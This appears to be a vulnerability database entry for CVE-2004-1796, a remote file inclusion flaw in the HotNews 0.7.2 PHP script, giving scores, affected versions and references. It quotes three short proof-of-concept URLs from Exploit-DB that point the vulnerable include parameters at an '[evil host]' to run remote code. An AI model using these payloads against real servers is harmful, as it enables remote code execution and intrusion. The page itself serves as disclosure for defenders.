CVE-2004-1796
Published 2004-12-31
Priority: P3 · 44 · high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 9.32% (94.8th percentile)
PHP remote file inclusion vulnerability in HotNews 0.7.2 and earlier allows remote attackers to execute arbitrary PHP code via the (1) config[header] parameter to hotnews-engine.inc.php3 or (2) config[incdir] parameter to hnmain.inc.php3.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hotnews | hotnews | — | — |
| hotnews | hotnews | — | — |
| hotnews | hotnews | — | — |
| hotnews | hotnews | — | — |
| hotnews | hotnews | — | — |
| hotnews | hotnews | — | — |
| hotnews | hotnews | — | — |
No detection rules found.
Exploit-DB
HotNews 0.7.2 - Remote File Inclusion
exploitdb·2010-04-11
---
HotNews 0.7.2 Remote File Inclusion Vulnerability
** Bugs Found by team_elite | http://manadocoding.net | http://www.g
Exploit-DB
HotNews 0.x - 'config[incdir]' Remote File Inclusion
exploitdb·2004-01-05
---
source: https://www.securityfocus.com/bid/9357/info
HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software.
http://www.example.com/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/func.inc.php3
http://www.example.com/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php3
Exploit-DB
HotNews 0.x - 'hotnews-engine.inc.php3?config[header]' Remote File Inclusion
exploitdb·2004-01-05
---
source: https://www.securityfocus.com/bid/9357/info
HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software.
http://www.example.com/includes/hotnews-engine.inc.php3?config[header]=http://[evil host]/[evil file]
No writeups or analysis indexed.
http://secunia.com/advisories/10551
http://securitytracker.com/id?1008608
http://sourceforge.net/forum/forum.php?forum_id=342594
http://www.osvdb.org/3332
http://www.osvdb.org/3405
http://www.securityfocus.com/archive/1/348840
http://www.securityfocus.com/bid/9357
https://exchange.xforce.ibmcloud.com/vulnerabilities/14140
2004-12-31
Published